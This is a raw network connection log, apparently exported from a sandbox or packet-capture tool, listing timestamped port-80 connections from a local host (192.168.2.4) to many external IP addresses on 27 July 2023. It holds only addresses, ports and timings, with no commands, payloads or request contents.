                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612813950 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612816095 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612837076 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612837076 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612859011 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612869024 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612881899 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612890959 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612910986 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612930059 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613694906 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613724947 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613754988 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613754988 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613780022 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613780975 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613800049 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613802910 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613821030 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613825083 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613843918 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613845110 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613864899 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.613886118 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614343882 CEST8049814170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614598989 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614629984 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614649057 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614655018 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614675045 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614675999 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614696980 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614706039 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614716053 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614720106 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614737988 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614739895 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614759922 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.614779949 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615504980 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615526915 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615545988 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615566015 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615586042 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615609884 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615609884 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615638971 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615654945 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615659952 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615683079 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615684986 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615720034 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.615730047 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.616441011 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.616466999 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.616493940 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.616497993 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.616511106 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.616516113 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.616538048 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617001057 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617028952 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617038965 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617049932 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617057085 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617077112 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617091894 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617110014 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617111921 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617135048 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617136955 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617155075 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617158890 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617183924 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617202997 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617760897 CEST8049820202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617949963 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.617980003 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618007898 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618012905 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618037939 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618040085 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618057966 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618068933 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618098021 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618098021 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618112087 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618119955 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618140936 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618141890 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618160963 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618169069 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618181944 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618191957 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618212938 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618237972 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618844986 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618866920 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618899107 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618926048 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618937969 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618963003 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618980885 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.618992090 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619007111 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619013071 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619034052 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619091988 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619122982 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619133949 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619133949 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619178057 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619179010 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619221926 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619223118 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619240046 CEST8049820202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619270086 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619303942 CEST4982080192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619759083 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619807005 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619812012 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619837999 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619857073 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619865894 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619882107 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619895935 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619910955 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619920015 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619937897 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619945049 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619962931 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619965076 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619986057 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.619987011 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620007992 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620014906 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620031118 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620059013 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620656013 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620686054 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620713949 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620716095 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620738983 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620745897 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620762110 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620773077 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620791912 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620794058 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620815039 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620815992 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620836020 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620839119 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620860100 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620860100 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620879889 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620881081 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620902061 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.620923042 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.621555090 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.621592045 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.621613026 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.621619940 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.621637106 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.621654987 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.629165888 CEST4981980192.168.2.460.43.154.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.654217005 CEST804982269.163.239.62192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.654499054 CEST804982269.163.239.62192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.654571056 CEST4982280192.168.2.469.163.239.62
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.693319082 CEST4982080192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.711446047 CEST80498263.140.13.188192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.711654902 CEST4982680192.168.2.43.140.13.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.759849072 CEST8049814170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.759943008 CEST4981480192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.771054029 CEST4982680192.168.2.43.140.13.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.771450996 CEST4982780192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.895987988 CEST8049827108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.896136045 CEST4982780192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.909442902 CEST4982780192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.909796953 CEST804981960.43.154.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.909879923 CEST4981980192.168.2.460.43.154.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.921977997 CEST80498263.140.13.188192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.922018051 CEST80498263.140.13.188192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.922060966 CEST4982680192.168.2.43.140.13.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.922097921 CEST4982680192.168.2.43.140.13.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.960345030 CEST4982680192.168.2.43.140.13.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.975281954 CEST8049820202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.975373983 CEST4982080192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.027879953 CEST4979380192.168.2.4137.118.26.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.032850981 CEST8049827108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.040438890 CEST8049827108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.040513992 CEST4982780192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.052160025 CEST4982880192.168.2.43.140.13.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.082274914 CEST8049761147.154.0.23192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.082370996 CEST4976180192.168.2.4147.154.0.23
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.097342968 CEST4982780192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.105592012 CEST4982980192.168.2.451.79.51.72
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.110579967 CEST80498263.140.13.188192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.125160933 CEST4983080192.168.2.482.201.61.230
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.139539003 CEST4983180192.168.2.434.117.168.233
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.153783083 CEST804983134.117.168.233192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.153923035 CEST4983180192.168.2.434.117.168.233
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.154067993 CEST804983082.201.61.230192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.154184103 CEST4983080192.168.2.482.201.61.230
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.154236078 CEST4983180192.168.2.434.117.168.233
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.157706022 CEST4983080192.168.2.482.201.61.230
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.168375015 CEST804983134.117.168.233192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.181720972 CEST804983134.117.168.233192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.181826115 CEST4983180192.168.2.434.117.168.233
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.184218884 CEST804983082.201.61.230192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.191682100 CEST804983082.201.61.230192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.191765070 CEST4983080192.168.2.482.201.61.230
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.201730013 CEST80498283.140.13.188192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.201836109 CEST4982880192.168.2.43.140.13.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.209330082 CEST804982951.79.51.72192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.211211920 CEST4982980192.168.2.451.79.51.72
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.228863955 CEST8049827108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.229088068 CEST4982780192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.297496080 CEST4982880192.168.2.43.140.13.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.317549944 CEST4982980192.168.2.451.79.51.72
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.326816082 CEST4983080192.168.2.482.201.61.230
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.343482971 CEST4983280192.168.2.472.44.93.236
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.360407114 CEST804983082.201.61.230192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.360527039 CEST4983080192.168.2.482.201.61.230
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.413160086 CEST804972669.163.239.62192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.414685965 CEST4983380192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.421293020 CEST804982951.79.51.72192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.421348095 CEST804982951.79.51.72192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.421452999 CEST4982980192.168.2.451.79.51.72
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.422018051 CEST4982980192.168.2.451.79.51.72
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.446727037 CEST80498283.140.13.188192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.446768999 CEST80498283.140.13.188192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.446810961 CEST4982880192.168.2.43.140.13.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.446875095 CEST4982880192.168.2.43.140.13.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.459280014 CEST4982880192.168.2.43.140.13.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.467545986 CEST804983272.44.93.236192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.467648029 CEST4983280192.168.2.472.44.93.236
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.525542021 CEST804982951.79.51.72192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.608139038 CEST80498283.140.13.188192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.680475950 CEST4983280192.168.2.472.44.93.236
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.719229937 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.719352007 CEST4983380192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.721080065 CEST4983580192.168.2.496.127.180.42
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.721096039 CEST4983480192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.737317085 CEST8049834188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.737515926 CEST4983480192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.740089893 CEST4983380192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.740658045 CEST4983480192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.756812096 CEST8049834188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.768513918 CEST8049834188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.768618107 CEST4983480192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.783622026 CEST8049782162.43.120.128192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.783795118 CEST4978280192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.804439068 CEST804983272.44.93.236192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.806152105 CEST804983272.44.93.236192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.806179047 CEST804983272.44.93.236192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.806302071 CEST4983280192.168.2.472.44.93.236
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.827981949 CEST4983680192.168.2.477.68.50.105
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.860728979 CEST804983677.68.50.105192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.860841036 CEST4983680192.168.2.477.68.50.105
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.961277962 CEST4983680192.168.2.477.68.50.105
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.993683100 CEST804983677.68.50.105192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.993719101 CEST804983677.68.50.105192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.994108915 CEST4983680192.168.2.477.68.50.105
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.030741930 CEST4983780192.168.2.4217.19.237.54
